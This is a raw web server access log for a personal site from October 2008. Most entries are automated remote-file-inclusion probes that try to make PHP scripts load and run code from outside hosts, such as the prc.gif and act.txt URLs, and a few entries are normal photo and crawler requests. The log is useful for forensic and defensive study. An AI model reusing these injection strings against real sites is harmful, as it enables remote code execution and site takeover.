72.199.235.196 - - [26/Oct/2008:10:35:48 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-177_0.jpg HTTP/1.1" 200 258120 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:35:50 -0700] "GET /logs/access_080224.log//modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.38.38.231 - - [26/Oct/2008:10:35:50 -0700] "GET /logs/access_080224.log//modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
82.148.160.16 - - [26/Oct/2008:10:35:54 -0700] "GET /logs/access_080224.log//modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
218.234.19.139 - - [26/Oct/2008:10:36:00 -0700] "GET /logs/access_080224.log//modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:36:01 -0700] "GET /logs/access_080122.log//modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:36:01 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.253.128.88 - - [26/Oct/2008:10:36:07 -0700] "GET /logs/access_080927.log//admin/business_inc/saveserver.php?thisdir=http://aa-acu.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:36:07 -0700] "GET /logs/access_080920.log//admin/business_inc/saveserver.php?thisdir=http://aa-acu.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:10:36:08 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-071.jpg HTTP/1.1" 200 452343 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
72.199.235.196 - - [26/Oct/2008:10:36:14 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-087_1.jpg HTTP/1.1" 200 408915 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
211.234.110.184 - - [26/Oct/2008:10:36:43 -0700] "GET /logs/access_080619.log//include/bbs.lib.inc.php?site_path=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.234.110.184 - - [26/Oct/2008:10:36:44 -0700] "GET /include/bbs.lib.inc.php?site_path=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.234.110.184 - - [26/Oct/2008:10:36:44 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:36:45 -0700] "GET /logs/access_080224.log//modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.6.22.187 - - [26/Oct/2008:10:37:10 -0700] "GET /bikes/dteel/2008_07_05/?D=A HTTP/1.0" 200 992 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:10:37:16 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:37:17 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.149.118.74 - - [26/Oct/2008:10:37:17 -0700] "GET /logs/access_080409.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.149.118.74 - - [26/Oct/2008:10:37:18 -0700] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.149.118.74 - - [26/Oct/2008:10:37:18 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:37:22 -0700] "GET /logs/access_080122.log//modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:37:22 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:37:22 -0700] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:37:25 -0700] "GET /logs/access_080122.log//modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:37:25 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:37:25 -0700] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:37:27 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-047_1.jpg HTTP/1.1" 200 386939 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:37:49 -0700] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:37:49 -0700] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:37:49 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.148.160.16 - - [26/Oct/2008:10:37:49 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:37:50 -0700] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.148.160.16 - - [26/Oct/2008:10:37:50 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.19.139 - - [26/Oct/2008:10:38:07 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.108.193 - - [26/Oct/2008:10:38:09 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_27/?S=A HTTP/1.1" 200 1633 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:38:11 -0700] "GET /upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://sior.org/zero/control.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
70.85.192.194 - - [26/Oct/2008:10:38:11 -0700] "GET /logs/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://sior.org/zero/control.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
82.148.160.16 - - [26/Oct/2008:10:38:50 -0700] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.148.160.16 - - [26/Oct/2008:10:38:51 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.19.139 - - [26/Oct/2008:10:38:54 -0700] "GET /logs/access_080224.log//modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:38:54 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.234.19.139 - - [26/Oct/2008:10:38:54 -0700] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:10:38:59 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.19.139 - - [26/Oct/2008:10:39:00 -0700] "GET /logs/access_080224.log//modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:39:00 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.19.139 - - [26/Oct/2008:10:39:00 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.234.19.139 - - [26/Oct/2008:10:39:01 -0700] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.110.184 - - [26/Oct/2008:10:39:01 -0700] "GET /logs/access_080518.log//include/bbs.lib.inc.php?site_path=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.146.251.182 - - [26/Oct/2008:10:39:04 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.146.15.54 - - [26/Oct/2008:10:39:04 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [26/Oct/2008:10:39:05 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.101.4.49 - - [26/Oct/2008:10:39:17 -0700] "GET /logs/access_080829.log/errors.php?error=http://cbmarketer.com/images/t_pane.jpg/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [26/Oct/2008:10:39:17 -0700] "GET /errors.php?error=http://cbmarketer.com/images/t_pane.jpg/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:39:18 -0700] "GET /logs/errors.php?error=http://cbmarketer.com/images/t_pane.jpg/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [26/Oct/2008:10:39:18 -0700] "GET /logs/access_080810.log/errors.php?error=http://cbmarketer.com/images/t_pane.jpg/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [26/Oct/2008:10:39:19 -0700] "GET /logs/access_080829.log/errors.php?error=http://cbmarketer.com/images/t_pane.jpg/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:39:19 -0700] "GET /errors.php?error=http://cbmarketer.com/images/t_pane.jpg/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [26/Oct/2008:10:39:19 -0700] "GET /logs/errors.php?error=http://cbmarketer.com/images/t_pane.jpg/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [26/Oct/2008:10:39:20 -0700] "GET /logs/access_080810.log/errors.php?error=http://cbmarketer.com/images/t_pane.jpg/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [26/Oct/2008:10:39:20 -0700] "GET /logs/access_080829.log/errors.php?error=http://cbmarketer.com/images/t_pane.jpg/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:39:20 -0700] "GET /errors.php?error=http://cbmarketer.com/images/t_pane.jpg/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.101.4.49 - - [26/Oct/2008:10:39:22 -0700] "GET /logs/access_080810.log/errors.php?error=http://cbmarketer.com/images/t_pane.jpg/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:39:24 -0700] "GET /logs/access.log//twindow_search_rank.php?shop_this_skin_path=http://nawaoh1.t35.com/cd/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:39:24 -0700] "GET /twindow_search_rank.php?shop_this_skin_path=http://nawaoh1.t35.com/cd/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.15.192.17 - - [26/Oct/2008:10:39:24 -0700] "GET /logs//twindow_search_rank.php?shop_this_skin_path=http://nawaoh1.t35.com/cd/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.25.168.50 - - [26/Oct/2008:10:39:26 -0700] "GET /logs/access_080621.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.kuiwa.at/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:39:27 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.kuiwa.at/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.25.168.50 - - [26/Oct/2008:10:39:27 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.kuiwa.at/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.19.139 - - [26/Oct/2008:10:39:28 -0700] "GET /logs/access_080106.log/modifyform.html?code=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:39:29 -0700] "GET /modifyform.html?code=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:39:29 -0700] "GET /logs/modifyform.html?code=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:39:33 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.25.168.50 - - [26/Oct/2008:10:39:34 -0700] "GET /logs/access_080412.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.kuiwa.at/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:10:39:35 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-017_3.jpg HTTP/1.1" 200 441222 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:39:44 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.19.139 - - [26/Oct/2008:10:39:45 -0700] "GET /logs/access_080621.log/modifyform.html?code=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.110.184 - - [26/Oct/2008:10:39:48 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.87.154.41 - - [26/Oct/2008:10:40:02 -0700] "GET /logs/access_080415.log//components/calendar/com_calendar.php?absolute_path=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.87.154.41 - - [26/Oct/2008:10:40:02 -0700] "GET /components/calendar/com_calendar.php?absolute_path=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.87.154.41 - - [26/Oct/2008:10:40:02 -0700] "GET /logs//components/calendar/com_calendar.php?absolute_path=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:40:05 -0700] "GET /logs/access_080224.log//modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.234.19.139 - - [26/Oct/2008:10:40:05 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:40:05 -0700] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.146.102.38 - - [26/Oct/2008:10:40:12 -0700] "GET /logs//index.php?option=com_akocomment&task=quote&id=&Itemid=&mosConfig_absolute_path=http://www.itpro-ua.com/dotproject//images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:40:16 -0700] "GET /index.php?option=com_akocomment&task=quote&id=&Itemid=&mosConfig_absolute_path=http://www.itpro-ua.com/dotproject//images/.bash/in.txt? HTTP/1.1" 200 95514 "-" "libwww-perl/5.810" "www.dmulk.com"
81.176.226.164 - - [26/Oct/2008:10:40:18 -0700] "GET /logs/access_080610.log/errors.php?error=http://immobiliarecervinia.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.226.164 - - [26/Oct/2008:10:40:18 -0700] "GET /errors.php?error=http://immobiliarecervinia.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:40:19 -0700] "GET /logs/errors.php?error=http://immobiliarecervinia.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.101.4.49 - - [26/Oct/2008:10:40:26 -0700] "GET /errors.php?error=http://cbmarketer.com/images/t_pane.jpg/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:40:29 -0700] "GET /logs/access_080122.log//modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:40:29 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:40:29 -0700] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.33.51.184 - - [26/Oct/2008:10:40:39 -0700] "GET /logs/access_080418.log/index.php?option=com_phpshop&page=shop.browse&category_id=&option=com_phpshop&Itemid=&mosConfig_absolute_path=http://www.macbuff.com/my/plugins/spamx/magpierss/extlib/css.php/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.33.51.184 - - [26/Oct/2008:10:40:39 -0700] "GET /logs/index.php?option=com_phpshop&page=shop.browse&category_id=&option=com_phpshop&Itemid=&mosConfig_absolute_path=http://www.macbuff.com/my/plugins/spamx/magpierss/extlib/css.php/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.33.51.184 - - [26/Oct/2008:10:40:40 -0700] "GET /index.php?option=com_phpshop&page=shop.browse&category_id=&option=com_phpshop&Itemid=&mosConfig_absolute_path=http://www.macbuff.com/my/plugins/spamx/magpierss/extlib/css.php/bo.do??? HTTP/1.1" 200 95757 "-" "libwww-perl/5.805" "www.dmulk.com"
64.33.51.184 - - [26/Oct/2008:10:40:45 -0700] "GET /logs/access_080615.log/index.php?option=com_phpshop&page=shop.browse&category_id=&option=com_phpshop&Itemid=&mosConfig_absolute_path=http://www.macbuff.com/my/plugins/spamx/magpierss/extlib/css.php/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:40:51 -0700] "GET /logs/access_080224.log//modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.149.118.74 - - [26/Oct/2008:10:40:52 -0700] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:40:53 -0700] "GET /logs/access_080224.log//modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.234.110.184 - - [26/Oct/2008:10:40:59 -0700] "GET /include/bbs.lib.inc.php?site_path=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.234.19.139 - - [26/Oct/2008:10:41:03 -0700] "GET /logs/access_080122.log//modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.251.24.119 - - [26/Oct/2008:10:41:09 -0700] "GET /logs/access_080703.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.251.24.119 - - [26/Oct/2008:10:41:09 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.251.24.119 - - [26/Oct/2008:10:41:09 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.251.24.119 - - [26/Oct/2008:10:41:11 -0700] "GET /logs/access_080518.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.174.113.100 - - [26/Oct/2008:10:41:13 -0700] "GET /logs/access_080418.log/index.php?option=com_phpshop&page=shop.browse&category_id=&option=com_phpshop&Itemid=&mosConfig_absolute_path=http://www.macbuff.com/my/plugins/spamx/magpierss/extlib/css.php/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:41:13 -0700] "GET /logs/index.php?option=com_phpshop&page=shop.browse&category_id=&option=com_phpshop&Itemid=&mosConfig_absolute_path=http://www.macbuff.com/my/plugins/spamx/magpierss/extlib/css.php/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:41:16 -0700] "GET /index.php?option=com_phpshop&page=shop.browse&category_id=&option=com_phpshop&Itemid=&mosConfig_absolute_path=http://www.macbuff.com/my/plugins/spamx/magpierss/extlib/css.php/bo.do??? HTTP/1.1" 200 95789 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.19.139 - - [26/Oct/2008:10:41:18 -0700] "GET /logs/access_080122.log//modules/Neos_Chronos/header.php?base_folder=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:41:20 -0700] "GET /logs/access_080615.log/index.php?option=com_phpshop&page=shop.browse&category_id=&option=com_phpshop&Itemid=&mosConfig_absolute_path=http://www.macbuff.com/my/plugins/spamx/magpierss/extlib/css.php/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.161.154 - - [26/Oct/2008:10:41:36 -0700] "GET /logs/access_080410.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.herbsall.4yz.com/images/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
